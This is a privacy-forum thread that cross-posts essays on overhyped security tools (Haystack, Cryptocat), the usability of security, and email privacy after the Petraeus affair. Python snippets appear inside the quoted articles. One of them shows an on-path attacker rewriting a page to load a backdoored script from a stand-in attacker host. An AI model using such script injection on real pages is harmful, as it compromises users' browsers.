Ξ welcome to cryptostorm's member forums ~ you don't have to be a cryptostorm member to post here Ξ
∞ take a peek at our legendary cryptostorm_is twitter feed if you're into that kind of thing ∞
Ξ we're rolling out voodoo network security across cryptostorm - big things happening, indeed! Ξ
Ξ any OpenVPN configs found on the forum are likely outdated. For the latest, visit GitHub Ξ

Security, usability, & real-world privacy tool demands

Looking for a bit more than customer support, and want to learn more about what cryptostorm is, what we've been announcing lately, and how the cryptostorm network makes the magic? This is a great place to start, so make yourself at home!
User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Security, usability, & real-world privacy tool demands

Postby Pattern_Juggled » Wed Dec 19, 2012 11:04 am

How secure is secure? And who says so?
20 August 2012

It’s ironic that a way for file sharers to avoid paying for their viewing with companies such as Blockbuster is to use a block buster – a VPN designed to help get around ISP blocks on sites such as The Pirate Bay. But are these products safe to use?

At the end of July, security researcher Christopher Soghoian made an impassioned plea: Tech journalists: Stop hyping unproven security tools. He cited the praise heaped upon Haystack, an encryption product produced by Austin Heap, “a San Francisco software developer, who the Guardian described as a ‘tech wunderkind’ with the ‘know-how to topple governments’.” Newsweek said that Heap had “found the perfect disguise for dissidents in their cyberwar against the world’s dictators.”

But, said Soghoian, when Jacob Appelbaum got hold of a copy and analyzed it, “The results were not pretty -- he described it as ‘the worst piece of software I have ever had the displeasure of ripping apart’.” More recently Soghoian is concerned about the virtually unfettered praise of Cryptocat. Wired headlines a story, “This Cute Chat Site Could Save Your Life and Help Overthrow Your Government.” But Soghoian points out that “several prominent experts in the security community have criticized the web-based version of Cryptocat. These critics include Thomas Ptacek, Zooko Wilcox-O'Hearn, Moxie Marlinspike and Jake Appelbaum.”

It’s a serious issue. Dissidents around the world depend upon security software to protect themselves from hostile government surveillance – and it’s only natural that they should turn to the press for ideas. But journalists are, in general, experts on what makes a story – not what makes secure software. Soghoian’s plea to journalists is simple: “When a PR person retained by a new hot security startup pitches you, consider approaching an independent security researcher or two for their thoughts.”

Steganos Software is not a new company. It’s been around for some time, and has well-respected products. But when Infosecurity heard about its new VPN, OkayFreedom, it decided to approach an independent security expert. Steganos says of the product, “Access websites blocked in your country;” “Surf the Net anonymously,” and “Protect your privacy on the internet.”

Infosecurity asked Christopher Soghoian for his thoughts on looking at new VPN products. “There are two things to consider here,” he said. “Are the data retention policies of the VPN service good or not (where good = privacy protecting), and how can we be sure that the VPN service actually follows the stated retention policies?” He points to HideMyAss, a UK-based VPN company that handed over information on LulzSec users leading to their arrest. There seems to be little point in using a service to hide from your government (whichever one it happens to be) if the service provider hands over your information.

In this instance Soghoian says that Steganos has excellent retention policies, but that “there is absolutely no way to know that they have actually implemented this policy. At the end of the day, you are taking them on their word.” In the final analysis, this applies to much of the security software we rely on. “However,” he added, “it is worth noting that Germany has pretty strong privacy laws, and very active regulation by privacy commissioners, so if any evidence is uncovered suggesting that these guys are lying about their retention policies, I imagine that regulators could throw the book at them.”
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.be | keybase pgp | mit pgp | ðørkßöt-on-console | git 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f


Tech journalists: Stop hyping unproven security tools

Postby Pattern_Juggled » Wed Dec 19, 2012 11:21 am

{note that Chris Soghoian's blog entry contains a wealth of links to secondary sources, as well as excellent comments posted by readers; we have not replicated those links in this cross-post and, as with all such cross-posts we make of articles here, our intent is to provide easy access to the text to encourage discussion - readers seeking the full articles are encouraged to visit the underlying publisher, to which we always link in the title of the article, as below - Pt_Jd}


Tech journalists: Stop hyping unproven security tools
Monday, July 30, 2012

Preface: Although this essay compares the media's similar hyping of Haystack and Cryptocat, the tools are, at a technical level, in no way similar. Haystack was, at best, snake oil peddled by a charlatan. Cryptocat is an interesting, open-source tool created by a guy who means well, and usually listens to feedback.

In 2009, media outlets around the world discovered, and soon began to shower praise upon Haystack, a software tool designed to allow Iranians to evade their government's Internet filtering. Haystack was the brainchild of Austin Heap, a San Francisco software developer, who the Guardian described as a "tech wunderkind" with the "know-how to topple governments."

The New York Times wrote that Haystack "makes it near impossible for censors to detect what Internet users are doing." The newspaper also quoted one of the members of the Haystack team saying that "It's encrypted at such a level it would take thousands of years to figure out what you’re saying."

Newsweek stated that Heap had "found the perfect disguise for dissidents in their cyberwar against the world’s dictators." The magazine revealed that the tool, which Heap and a friend had built in "less than a month and many all-nighters" of coding, was equipped with "a sophisticated mathematical formula that conceals someone’s real online destinations inside a stream of innocuous traffic."

Heap was not content to merely help millions of oppressed Iranians. Newsweek quoted the 20-something developer revealing his long term goal: "We will systematically take on each repressive country that censors its people. We have a list. Don’t piss off hackers who will have their way with you."

The Guardian even selected Heap as its Innovator of the Year. The chair of the award panel praised Heap's "vision and unique approach to tackling a huge problem" as well as "his inventiveness and bravery."

This was a feel-good tech story that no news editor could ignore. A software developer from San Francisco taking on a despotic regime in Tehran.

There was just one problem: The tool hadn't been evaluated by actual security experts. Eventually, Jacob Appelbaum obtained a copy of the software and analyzed it. The results were not pretty -- he described it as "the worst piece of software I have ever had the displeasure of ripping apart."

Soon after, Daniel Colascione, the lead developer of Haystack, resigned from the project, saying the program was an example of "hype trumping security." Heap ultimately shuttered Haystack.

After the proverbial shit hit the fan, the Berkman Center's Jillian York wrote:

I certainly blame Heap and his partners–for making outlandish claims about their product without it ever being subjected to an independent security review, and for all of the media whoring they’ve done over the past year.

But I also firmly place blame on the media, which elevated the status of a person who, at best was just trying to help, and a tool which very well could have been a great thing, to the level of a kid genius and his silver bullet, without so much as a call to circumvention experts.



Cryptocat: The press is still hypin'

In 2011, Nadim Kobeissi, then a 20-year-old college student in Canada, started to develop Cryptocat, a web-based secure chat service. The tool was criticized by security experts after its initial debut, but stayed largely below the radar until April 2012, when it won an award at the Wall Street Journal's Data Transparency Codeathon. Days later, the New York Times published a profile of Kobeissi, whom the newspaper described as a "master hacker."

Cryptocat originally launched as a web-based application, which required no installation of software by the user. As Kobeissi told the New York Times:

"The whole point of Cryptocat is that you click a link and you’re chatting with someone over an encrypted chat room... That’s it. You’re done. It’s just as easy to use as Facebook chat, Google chat, anything.”


There are, unfortunately, many problems with the entire concept of web based crypto apps, the biggest of which is the difficulty of securely delivering javascript code to the browser. In an effort to address these legitimate security concerns, Kobeissi released a second version of Cryptocat in 2011, delivered as a Chrome browser plugin. The default version of Cryptocat on the public website was the less secure, web-based version, although users visiting the page were informed of the existence of the more secure Chrome plugin.
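The delivery problem is easy to make concrete with a toy sketch (illustrative only; the hostnames and the rewrite rule are hypothetical, not taken from any real incident): if the page carrying the crypto JavaScript reaches the browser without TLS integrity protection, any on-path attacker can rewrite the response in transit, replacing the crypto code itself.

```python
import re

# Toy illustration, not real attack tooling: an unauthenticated HTTP
# response can be rewritten by anyone on the network path, so the
# browser may execute a backdoored script instead of the real one.
page = '<html><script src="https://cryptochat.example/crypto.js"></script></html>'

def on_path_rewrite(html: str) -> str:
    """Swap the script source, as a man-in-the-middle could do in transit."""
    return re.sub(r'src="https://[^"]+"',
                  'src="http://attacker.example/backdoored.js"', html)

tampered = on_path_rewrite(page)
# The browser has no way to tell the difference: it simply executes
# whatever script arrives in the response it received.
print(tampered)
```

This is why a downloadable plugin, installed once over a verified channel, sidesteps the problem that a freshly-delivered web page cannot.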


Forbes, Cryptocat and Hushmail

Two weeks ago, Jon Matonis, a blogger at Forbes, included Cryptocat in his list of 5 Essential Privacy Tools For The Next Crypto War. He wrote that the tool "establishes a secure, encrypted chat session that is not subject to commercial or government surveillance."

If there is anyone who should be reluctant to offer such bold, largely unqualified praise to a web-based secure communications tool like Cryptocat, it should be Matonis. Several years ago, before he blogged for Forbes, Matonis was the CEO of Hushmail, a web-based encrypted email service. Like Cryptocat, Hushmail offered a 100% web-based client, as well as a downloadable Java-based client which was more resistant to certain interception attacks, but less easy to use.

Hushmail had claimed in public marketing materials that "not even a Hushmail employee with access to our servers can read your encrypted e-mail, since each message is uniquely encoded before it leaves your computer." It was therefore quite a surprise when Wired reported in 2007 that Hushmail had been forced by a Canadian court to insert a backdoor into its web-based service, enabling the company to obtain decrypted emails sent and received by a few of its users.

The moral of the Hushmail story is that web based crypto tools often cannot protect users from surveillance backed by a court order.


Wired's ode to Cryptocat

This past Friday, Wired published a glowing, 2000 word profile on Kobeissi and Cryptocat by Quinn Norton. It begins with a bold headline: "This Cute Chat Site Could Save Your Life and Help Overthrow Your Government," after which, Norton describes the Cryptocat web app as something that can "save lives, subvert governments and frustrate marketers."

In her story, Norton emphasizes the usability benefits of Cryptocat over existing secure communications tools, and the impact this will have on the average user for whom installing Pidgin and OTR is too difficult. Cryptocat, she writes, will allow "anyone to use end-to-end encryption to communicate without ... mucking about with downloading and installing other software." As Norton puts it, Cryptocat's no-download-required distribution model "means non-technical people anywhere in the world can talk without fear of online snooping from corporations, criminals or governments."

In short, Norton paints a picture in which Cryptocat fills a critical need: secure communications tools for the 99%, for the tl;dr crowd, for those who can't, don't know how to, don't have time to, or simply don't want to download and install software. For such users, Cryptocat sounds like a gift from the gods.


Journalists love human interest stories

Kobeissi presents the kind of human interest story that journalists dream about: A Lebanese hacker who has lived through 4 wars in his 21 years, whose father was killed, whose house was bombed, who was interrogated by the "cyber-intelligence authorities" in Lebanon and by the Department of Homeland Security in the US, and who is now building a tool to help others in the Arab world overthrow their oppressive governments.

As such, it isn't surprising that journalists and their editors aren't keen to prominently highlight the unproven nature of Cryptocat, even though I'm sure Kobeissi stresses it in every interview. After all, which journalist in their right mind would want to spoil this story by mentioning that the web-based Cryptocat system is vulnerable to trivial man in the middle, HTTPS stripping attacks when accessed using Internet Explorer or Safari? What idiot would sabotage the fairytale by highlighting that Cryptocat is unproven, an experimental project by a student interested in cryptography?

And so, such facts are buried. The New York Times waited until paragraph 10 in a 16-paragraph story to reveal that Kobeissi told the journalist that his tool "is not ready for use by people in life-and-death situations." Likewise, Norton waits until paragraph 27 of her Wired profile before she reveals that "Kobeissi has said repeatedly that Cryptocat is an experiment" or that "structural flaws in browser security and Javascript still dog the project." The preceding 26 paragraphs are filled with feel-good fluff, including a description of his troubles at the US border and a three-paragraph no-comment from US Customs.

At best, this is bad journalism, and at worst, it is reckless. If Cryptocat is the secure chat tool for the tl;dr crowd, burying its known flaws 27 paragraphs down in a story almost guarantees that many users won't learn about the risks they are taking.


Cryptocat has faced extensive criticism from experts

Norton acknowledges in paragraph 23 of her story that "Kobeissi faced criticism from the security community." However, she never actually quotes any critics. She quotes Kobeissi saying that "Cryptocat has significantly advanced the field of browser crypto" but doesn't give anyone the opportunity to challenge the statement.

Other than Kobeissi, Norton's only other identified sources in the story are Meredith Patterson, a security researcher previously critical of Cryptocat, who is quoted saying "although [Cryptocat] got off to a bumpy start, he’s risen to the occasion admirably," and an unnamed active member of Anonymous, who is quoted saying "if it's a hurry and someone needs something quickly, [use] Cryptocat."

It isn't clear why Norton felt it wasn't necessary to publish any dissenting voices. From her public Tweets, it is, however, quite clear that Norton has no love for the crypto community, which she believes is filled with "privileged", "mostly rich 1st world white boys w/ no real problems who don't realize they only build tools [for] themselves."

Even though their voices were not heard in the Wired profile, several prominent experts in the security community have criticized the web-based version of Cryptocat. These critics include Thomas Ptacek, Zooko Wilcox-O'Hearn, Moxie Marlinspike and Jake Appelbaum. The latter two, coincidentally, have faced pretty extreme "real world [surveillance] problems", documented at length by Wired.


Security problems with Cryptocat and Kobeissi's response

Since Cryptocat was first released, security experts have criticized the web-based app, which is vulnerable to several attacks, some possible using automated tools. The response by Kobeissi to these concerns has long been to point to the existence of the Cryptocat browser plugin.

The problem is that Cryptocat is described by journalists, and by Kobeissi in interviews with journalists, as a tool for those who can't or don't want to install software. When Cryptocat is criticized, Kobeissi then points to a downloadable browser plugin that users can install. In short, the only technology that can protect users from network attacks against the web-only Cryptocat also neutralizes its primary, and certainly most publicized feature.

Over the past few weeks, criticism of the web-based Cryptocat and its vulnerability to attacks has increased, primarily on Twitter. Responding to the criticism, on Saturday, Kobeissi announced that the upcoming version 2 of Cryptocat will be browser-plugin only. At the time of writing this essay, the Cryptocat web-based interface also appears to be offline.

Kobeissi's decision to ditch the no-download-required version of Cryptocat came just one day after the publication of Norton's glowing Wired story, in which she emphasized that Cryptocat enables "anyone to use end-to-end encryption to communicate without ... mucking about with downloading and installing other software."

This was no doubt a difficult decision for Kobeissi. Rather than leading the development of a secure communications tool that Just Works without any download required, he must now rebrand Cryptocat as a communications tool that doesn't require operating system install privileges, or one that is merely easier to download and install. This is far less sexy, but, importantly, far more secure. He made the right choice.


Conclusion

The technology and mainstream media play a key role in helping consumers to discover new technologies. Although there is a certain amount of hype with the release of every new app or service (if there isn't, the PR people aren't doing their jobs), hype is dangerous for security tools.

It is by now well documented that humans engage in risk compensation. When we wear seatbelts, we drive faster. When cyclists wear helmets, drivers pass closer. These safety technologies at least work.

We also engage in risk compensation with security software. When we think our communications are secure, we are probably more likely to say things that we wouldn't if our calls were going over a telephone line or via Facebook. However, if the security software people are using is in fact insecure, then its users are put in danger.

Secure communications tools are difficult to create, even by teams of skilled cryptographers. The Tor Project is nearly ten years old, yet bugs and design flaws are still found and fixed every year by other researchers. Using Tor for your private communications is by no means 100% safe (although, compared to many of the alternatives, it is often better). However, Tor has had years to mature. Tools like Haystack and Cryptocat have not. No matter how good you may think they are, they're simply not ready for prime time.

Although human interest stories sell papers and lead to page clicks, the media needs to take some responsibility for its ignorant hyping of new security tools and services. When a PR person retained by a new hot security startup pitches you, consider approaching an independent security researcher or two for their thoughts. Even if it sounds great, please refrain from showering the tool with unqualified praise.

By all means, feel free to continue hyping the latest social-photo-geo-camera-dating app, but before you tell your readers that a new security tool will lead to the next Arab Spring or prevent the NSA from reading peoples' emails, step back, take a deep breath, and pull the power cord from your computer.


Re: How secure is secure? And who says so?

Postby Pattern_Juggled » Sat Dec 22, 2012 3:08 am

Despite what I said earlier, I'm pulling over one comment from the discussion of Chris' article, because it's insightful and worthy of further elaboration. To wit:

However, the 99% lay people probably won't use secure comms well, anyway. Here's a point in that direction: a KGB source once said the best information on secure STU-III telephones usually came just before someone decided to switch to secure mode. They chose convenience, were in a hurry, or just didn't care. Sidestepped the security. Many attackers try that, yet others realize the users will do it for them given enough time. ;)


Bingo.

That's the key issue, and it's an issue that essentially nobody in the "consumer security" industry ever discusses. If tools are even moderately less convenient than not using security tools at all then, ceteris paribus, actual "users" (I hate the term - reminds me of narcotics scenarios) will on average deploy the tools less often, and thus their actual, real-life security drops dramatically.

Look at the corner case: a perfectly-secure tool that is a fucking pain in the ass to use will not be used 99.9% of the time - so in 0.1% of cases, security is perfect. But in 99.9% it is horrible. Going at it from a Jeremy Bentham-style utilitarian calculation, that is a shitty outcome. Of course, if you are a tech snob you can just say "well those 99.9% are stupid and they are not using the tool and so they deserve what comes to them." Which is sure evidence of asshole syndrome. And dumb, too.
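That Bentham-style calculation can be sketched in a couple of lines (the numbers here are illustrative assumptions, not measurements): expected real-world protection is how often a tool actually gets used, times how well it works when it is used.

```python
# Expected-protection sketch: usage_rate is the fraction of sessions
# where the tool is actually used; effectiveness is how well it
# protects when used. Both figures below are made-up illustrations.
def expected_protection(usage_rate: float, effectiveness: float) -> float:
    return usage_rate * effectiveness

# A "perfect" tool that's such a pain almost nobody uses it:
perfect_but_painful = expected_protection(usage_rate=0.001, effectiveness=1.0)
# A merely decent tool that's easy enough that most people use it:
decent_but_easy = expected_protection(usage_rate=0.90, effectiveness=0.7)

print(perfect_but_painful)          # 0.001
print(round(decent_but_easy, 2))    # 0.63
```

The imperfect-but-usable tool wins the expected-value comparison by a wide margin, which is the whole point being argued above.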

Perfect security is a mirage in a world where actual humans use it. So we're not talking perfect, we're talking degrees - a scalar variable. And a key driver in that is going to be how much of a pain in the ass this stuff is to use. A perfect tool that is never used is useless. A totally pathetic tool that's super-easy to use is also useless. But both are equally useless, eh?

Sometimes there's real trade-offs. Getting folks to install OTR is a hurdle. Some folks just will never do it. So, for them, the alternative is to chat IM with no security at all... or to use some tool that they can actually wrap their head around - even if it's not perfectly secure. The latter is better than nothing, no? For most folks, in most situations, having some security is better than no security (although Chris points out that a false sense of security is the worst combination of all - and he's absolutely right about that).

Everyone beats up on Hushmail for snitching out customers, and perhaps not being quite as clear on the risk of same as they could have been. Without wading into those waters directly, it's worth remembering something. Yes, a very small subset of folks relied on Hushmail to protect them and were deeply disappointed when it failed to do so - that's a failure, and for those people a huge failure. I am not making light of that. But for, what, 99.99999% of messages sent through Hushmail no such failure took place. That's... not terrible, statistically. Not 100%, of course. But it's not 80%, or 40%. How secure are emails going through Yahoo's servers? Hahahaha....

This whole discussion does tend to float off into airy-fairy land, and in that regard Quinn is absolutely spot-on with her criticisms. That she gets shouted down for making them is sadly, ironically instructive. There is very much a cadre of "we criticize anyone who provides security tools that aren't theoretically perfect... even though we offer no real solution to the problem of the 99%ers simply choosing no security tool as their default option because the tools we produce are so fucking complex and difficult to use in the real world" people out there who have made good careers based on those attacks. They're easy attacks to make, aren't they? Because nothing is perfect, you can always find an imperfection - and then just hammer at it until the target breaks down in abject defeat. Yay!

But does it make the world a better place? Does it actually result in more people having better security in the stuff they do on a daily basis? No. Fuck no, in fact. It does not. Honestly: I wouldn't bother trying to explain how to use Tor (along with its countless limitations, constraints, known flaws, performance problems, and on and on and on...) to an actual human being. Even some tech geeks simply throw their hands up at it. It's kewl and secure and stuff - yay. And utterly impractical for 95% of use-case scenarios that actual humans actually do with computers online. So, job well done... for that 5%. What about the 95%? Tor can't go there.

This isn't to beat up on Tor, obviously. It's a solid tool - for certain use scenarios, and for certain users. But for most use scenarios and most users, it's a fucking disaster. There, I said it. A disaster - not because of technical flaws (although it does have those; see Evil Exit Node, ask HH The Dalai Lama) but because it's impractical for most people, most of the time. And trotting out Tor as the solution to all online security challenges is... stupid. But when one holds a cherished hammer, all the world starts looking like a nail...

Hosted security is NOT always a bad idea. Anyone who makes such a claim is unreasonable, cut off from real life. In real life, sometimes hosted security is the best security possible - not perfect, but not terrible either. And, like all other such things, there are good and bad forms of hosted security. So the question is much more complex than "hosted = bad" and I doubt anyone could say otherwise with a straight face. Well, actually people have made that claim - and it's silly on its face.

Cheers,


Trying to Keep Your E-Mails Secret When the C.I.A. Chief...

Postby Pattern_Juggled » Tue Dec 25, 2012 4:20 am

Trying to Keep Your E-Mails Secret When the C.I.A. Chief Couldn’t
By NICOLE PERLROTH | Published: November 16, 2012


If David H. Petraeus couldn’t keep his affair from prying eyes as director of the Central Intelligence Agency, then how is the average American to keep a secret?

In the past, a spymaster might have placed a flower pot with a red flag on his balcony or drawn a mark on page 20 of his mistress’s newspaper. Instead, Mr. Petraeus used Gmail. And he got caught.

Granted, most people don’t have the Federal Bureau of Investigation sifting through their personal e-mails, but privacy experts say people grossly underestimate how transparent their digital communications have become.

“What people don’t realize is that hacking and spying went mainstream a decade ago,” said Dan Kaminsky, an Internet security researcher. “They think hacking is some difficult thing. Meanwhile, everyone is reading everyone else’s e-mails — girlfriends are reading boyfriends’, bosses are reading employees’ — because it’s just so easy to do.”

Face it: no matter what you are trying to hide in your e-mail in-box or text message folder — be it an extramarital affair or company trade secrets — it is possible that someone will find out. If it involves criminal activity or litigation, the odds increase because the government has search and subpoena powers that can be used to get any and all information, whether it is stored on your computer or, as is more likely these days, stored in the cloud. And lawyers for the other side in a lawsuit can get reams of documents in court-sanctioned discovery.

Still determined? Thought so. You certainly are not alone, as there are legitimate reasons that people want to keep private all types of information and communications that are not suspicious (like the contents of your will, for example, or a chronic illness). In that case, here are your best shots at hiding the skeletons in your digital closet.


KNOW YOUR ADVERSARY. Technically speaking, the undoing of Mr. Petraeus was not the extramarital affair, per se, it was that he misunderstood the threat. He and his mistress/biographer, Paula Broadwell, may have thought the threat was their spouses snooping through their e-mails, not the F.B.I. looking through Google’s e-mail servers.

“Understanding the threat is always the most difficult part of security technology,” said Matthew Blaze, an associate professor of computer and information science at the University of Pennsylvania and a security and cryptography specialist. “If they believed the threat to be a government with the ability to get their login records from a service provider, not just their spouse, they might have acted differently.”

To hide their affair from their spouses, the two reportedly limited their digital communications to a shared Gmail account. They did not send e-mails, but saved messages to the draft folder instead, ostensibly to avoid a digital trail. It is unlikely either of their spouses would have seen it.

But neither took necessary steps to hide their computers’ I.P. addresses. According to published accounts of the affair, Ms. Broadwell exposed the subterfuge when she used the same computer to send harassing e-mails to a woman in Florida, Jill Kelley, who sent them to a friend at the F.B.I.

Authorities matched the digital trail from Ms. Kelley’s e-mails — some had been sent via hotel Wi-Fi networks — to hotel guest lists. In cross-checking lists of hotel guests, they arrived at Ms. Broadwell and her computer, which led them to more e-mail accounts, including the one she shared with Mr. Petraeus.


HIDE YOUR LOCATION The two could have masked their I.P. addresses using Tor, a popular privacy tool that allows anonymous Web browsing. They could have also used a virtual private network, which adds a layer of security to public Wi-Fi networks like the one in your hotel room.

By not doing so, Mr. Blaze said, “they made a fairly elementary mistake.” E-mail providers like Google and Yahoo keep login records, which reveal I.P. addresses, for 18 months, during which they can easily be subpoenaed. The Fourth Amendment requires the authorities to get a warrant from a judge to search physical property. Rules governing e-mail searches are far more lax: Under the 1986 Electronic Communications Privacy Act, a warrant is not required for e-mails six months old or older. Even if e-mails are more recent, the federal government needs a search warrant only for “unopened” e-mail, according to the Department of Justice’s manual for electronic searches. The rest requires only a subpoena.
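The warrant-versus-subpoena rules described above reduce to a small decision table; here is a sketch in Python (a simplification of the paragraph's 2012-era description of the Electronic Communications Privacy Act and the DOJ manual, not legal advice):

```python
# Which legal process compels an e-mail's contents from a provider,
# per the 1986 ECPA as characterized in the article above:
#   - six months old or older: subpoena only
#   - newer than six months: warrant if "unopened", subpoena otherwise
def process_required(age_days: int, opened: bool) -> str:
    if age_days >= 180:  # six months or older
        return "subpoena"
    return "subpoena" if opened else "warrant"

print(process_required(age_days=200, opened=False))  # subpoena
print(process_required(age_days=30, opened=False))   # warrant
print(process_required(age_days=30, opened=True))    # subpoena
```

The asymmetry with physical searches, which always require a warrant under the Fourth Amendment, is exactly the gap the article is pointing at.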

Google reported that United States law enforcement agencies requested data for 16,281 accounts from January to June of this year, and it complied in 90 percent of cases.


GO OFF THE RECORD At bare minimum, choose the “off the record” feature on Google Talk, Google’s instant messaging client, which ensures that nothing typed is saved or searchable in either person’s Gmail account.


ENCRYPT YOUR MESSAGES E-mail encryption services, like GPG, help protect digital secrets from eavesdroppers. Without an encryption key, any message stored in an in-box, or reached from the cloud, will look like gibberish. The sender must get a key from the recipient to send them an encrypted message. The drawback is that managing those keys can be cumbersome. And ultimately, even though a message’s contents are unreadable, the frequency of communication is not. That is bound to arouse suspicions.
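As a minimal sketch of the public-key principle GPG builds on (a toy RSA round trip with deliberately tiny, insecure parameters; real GPG uses large keys plus hybrid symmetric encryption, so this is a teaching aid, not something to use):

```python
# Toy RSA: anyone holding the public key (e, n) can encrypt; only the
# holder of the private key (d, n) can decrypt. Parameters are tiny
# textbook values -- hopelessly insecure, for illustration only.
p, q = 61, 53                 # small primes (demo only)
n = p * q                     # modulus: 3233
phi = (p - 1) * (q - 1)       # 3120
e = 17                        # public exponent, coprime with phi
d = pow(e, -1, phi)           # private exponent: modular inverse of e

def encrypt(m: int) -> int:
    return pow(m, e, n)       # c = m^e mod n

def decrypt(c: int) -> int:
    return pow(c, d, n)       # m = c^d mod n

msg = 42
assert decrypt(encrypt(msg)) == msg   # round trip recovers the message
```

This is also why the recipient's key is needed before sending, as noted above: encryption is done against the recipient's public half, and only their private half can undo it.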

[url=https://www.mywickr.com]Wickr[/url], a mobile app, performs a similar service for smartphones, encrypting video, photos and text and erasing deleted files for good. Typically, metadata for deleted files remains on a phone’s hard drive, where forensics specialists and skilled hackers can piece it back together. Wickr erases those files by writing gibberish over the metadata.


SET YOUR SELF-DESTRUCT TIMER Services like 10 Minute Mail allow users to open an e-mail address and send a message, and the address self-destructs 10 minutes later. Wickr also allows users to set a self-destruct timer for mobile communications so they can control how long a recipient can view a file before it disappears. But there is always the chance that your recipient captured screenshots.
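The self-destruct mechanic boils down to attaching an expiry time to a message and refusing to return it afterwards. The class below is a hypothetical sketch (the name `ExpiringMessage` is invented for illustration; real services enforce expiry server-side or in-app), and, as the article notes, nothing in it stops a recipient from capturing a screenshot first:

```python
# A minimal sketch of a self-destructing message: store an expiry
# deadline alongside the body and return nothing once it has passed.
import time

class ExpiringMessage:
    def __init__(self, body: str, ttl_seconds: float):
        self.body = body
        self.expires_at = time.monotonic() + ttl_seconds

    def read(self):
        if time.monotonic() > self.expires_at:
            return None          # the message has "self-destructed"
        return self.body

msg = ExpiringMessage("meet at noon", ttl_seconds=600)  # 10-minute window
print(msg.read())  # within the window: 'meet at noon'
```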


DROP THE DRAFT FOLDER IDEA It may sound clever, but saving e-mails in a shared draft folder is no safer than transmitting them. Christopher Soghoian, a policy analyst at the American Civil Liberties Union, noted that this tactic had long been used by terrorists — Khalid Shaikh Mohammed, the mastermind of the 9/11 attacks, and Richard Reid, “the shoe bomber,” among them — and it doesn’t work. E-mails saved to the draft folder are still stored in the cloud. Even if they are deleted, e-mail service providers can be compelled to provide copies.


USE ONLY A DESIGNATED DEVICE Security experts suggest using a separate, designated device for sensitive communications. Of course, few things say philanderer, or meth dealer, for that matter, like a second cellphone. (Watch “Breaking Bad.”)


GET AN ALIBI Then there is the obvious problem of having to explain to someone why you are carrying a pager or suddenly so knowledgeable about encryption technologies. “The sneakier you are, the weirder you look,” said Mr. Kaminsky.


DON’T MESS UP It is hard to pull off one of these steps, let alone all of them all the time. It takes just one mistake — forgetting to use Tor, leaving your encryption keys where someone can find them, connecting to an airport Wi-Fi just once — to ruin you.

“Robust tools for privacy and anonymity exist, but they are not integrated in a way that makes them easy to use,” Mr. Blaze warned. “We’ve all made the mistake of accidentally hitting ‘Reply All.’ Well, if you’re trying to hide your e-mails or account or I.P. address, there are a thousand other mistakes you can make.”


In the end, Mr. Kaminsky noted, if the F.B.I. is after your e-mails, it will find a way to read them. In that case, any attempt to stand in its way may just lull you into a false sense of security.

Some people think that if something is difficult to do, “it has security benefits, but that’s all fake — everything is logged,” said Mr. Kaminsky. “The reality is if you don’t want something to show up on the front page of The New York Times, then don’t say it.”


This article has been revised to reflect the following correction:

  • Correction: November 21, 2012

    An article on Saturday about the difficulty in keeping e-mail private misstated a procedure in e-mail encryption services. The sender of an encrypted message must first get a key from the intended recipient; the recipient does not need a key to read the message once it is sent.
...just a scatterbrained network topologist & crypto systems architect……… ҉҉҉

    ✨ ✨ ✨
pj@ðëëþ.be | keybase pgp | mit pgp | ðørkßöt-on-console | git 'er github
bitmessage:
BM-NBBqTcefbdgjCyQpAKFGKw9udBZzDr7f

User avatar

Topic Author
Pattern_Juggled
Posts: 1492
Joined: Sun Dec 16, 2012 6:34 am
Contact:

Re: How secure is secure? And who says so?

Postby Pattern_Juggled » Fri Jan 11, 2013 2:32 pm

Rafal Los has recently tweeted a link to an excellent addition to this discussion of impossible-to-use "security" technology. The full commentary is available here, complete with some picture-perfect screenshots of CAPTCHAs that only a machine could possibly decode. They highlight the point quite well, corner states or not.

I have taken the liberty of excerpting just a bit of his commentary here. He observes that...

"Security needs to be simpler on the well-meaning human than we are making it. Oddly enough, FaceBook's secondary validation system is really good at this... you've probably seen it once or twice because you are human and aren't trying to create a thousand accounts at once, or log into someone else's account. The notion that you need to 'challenge' everyone is silly in the vast majority of applications and will result in a rebellion of the consumer. In order to find that balance you need to inconvenience as few people as little as possible, and this means admitting that some baddies will slip through ...but that's within the 'tolerance'. By the way, your tolerance can't be 0." {italics in original}


Now what's interesting is that he's discussing mostly access-control methodologies, and in earlier posts in this thread I'm discussing network security frameworks. But, as I hope is not difficult to see, they're just surface-level reflections of a deeper reality: there is no such thing as viable zero-tolerance 'security.' If you push any security technology far enough, it becomes indistinguishable from a seamless barricade to actual usage (with apologies to Arthur C. Clarke).

This isn't an apologia for bad security; far from it. There are security problems (most, perhaps) that aren't the result of some difficult series of trade-offs - they're just bad security decisions made real. But in some cases - not the majority, but not zero either - there are deep structural decisions to be made about what must be traded off: the most secure system in the world is, in precise terms, one that is provably impossible for anyone to access.

It reminds me of a discussion I've had with a friend - or rather a bit of a rant I go on, and he just acts like he finds it humorous. I think it's funny, I really do... but I seem to be the only one. Here's what happened: being security-minded, he wrapped up some stuff in a well-configured, well-implemented TrueCrypt partition. He picked good algorithms (stacked two, in fact - and he randomly stacks the algorithms so, as he puts it "my own amnesia as to which algorithms I've used on which container helps ensure I can't ever possibly reveal the algorithms to anyone and thereby inadvertently help them to brute-force the container via some as-yet-undiscovered weakness in particular cryptographic techniques"... as I said, he's pretty security conscious!), and used not a password but a proper passphrase: well in excess of 20 characters, alphanumeric with extra weird characters thrown in. He didn't write the passphrase down, but rather memorized it as a transform of a phrase he already knew - and he told nobody else the phrase or the transform.
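My friend's passphrase choice was sound, at least; the arithmetic below shows why. This is back-of-the-envelope estimation, assuming independently chosen characters (a memorized transform of a known phrase has less entropy than this upper bound, but still vastly more than a short password):

```python
# Rough entropy estimate for a passphrase: bits ≈ length * log2(alphabet).
# Illustrative arithmetic only -- real-world phrases are less random.
import math

def entropy_bits(length: int, alphabet: int) -> float:
    return length * math.log2(alphabet)

# 8-char lowercase password vs. 20-char mixed passphrase (~80 symbols)
print(round(entropy_bits(8, 26)))    # → 38 bits: brute-forceable
print(round(entropy_bits(20, 80)))   # → 126 bits: out of practical reach
```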

So there are those data, wrapped securely in that cryptographic heaven. He then forgot the passphrase. He just forgot. It happens to all of us, eh? The phrase is gone. It wasn't written down, and he told nobody. And there's - obviously - no backdoor.

